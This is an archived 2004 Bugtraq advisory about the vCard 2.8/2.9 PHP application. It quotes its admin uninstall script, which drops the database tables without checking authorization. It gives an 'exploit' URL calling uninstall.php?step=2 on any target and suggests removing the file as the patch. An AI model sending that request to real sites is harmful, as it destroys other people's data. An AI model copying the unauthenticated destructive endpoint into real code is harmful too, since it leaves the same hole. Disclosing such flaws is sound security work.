lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040317222138.13812.qmail@search.securityfocus.com>
Date: 17 Mar 2004 22:21:38 -0000
From: saudi linux <ksa2ksa@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Vcard 2.8 uninstall script problem




Informations :
°°°°°°°°°°°°°°
Procduct: Vcard
Version : 2.9 may other VER
Problems : File uninstall & delete the table

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/admin/uninstall.php :
------------------------------------------------------------------------
[...]

<?
$step = $HTTP_GET_VARS['step'];
if (empty($step))
{
    echo "<p><b>Are you sure, uninstall vCard database tables and them contents?</b></p>";
    echo "<p>Yes, I'm sure. <a href='$PHP_SELF?step=2'>Click here to continue --></a></p>";
}

if ($step == 2)
{
	include "./config.inc.php";
	include("./db_mysql.inc.php");
	include("./functions.inc.php");

	$DB_site = new DB_Sql_vc;
	$DB_site->server = $hostname;
	$DB_site->user = $dbUser;
	$DB_site->password = $dbPass;
	$DB_site->database = $dbName;
	$DB_site->connect();
	$dbPass = "";
	$DB_site->password = "";

	//*********************************************
	$DB_site->query("DROP TABLE IF EXISTS vcard_abook ");
	$DB_site->query("DROP TABLE IF EXISTS vcard_account ");
?>

As u can see the script does not Check User Authorization 

Exploit:
°°°°°°°°°°
http://[target]/[Vcard folder]/admin/uninstall.php

or 

http://[target]/[Vcard folder]/admin/uninstall.php?step=2

patch:
°°°°°°°°°°
remove uninstall.php and protect admin folder by .htaccess



Saudi Linux 
KSA o0 KSA 0o



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ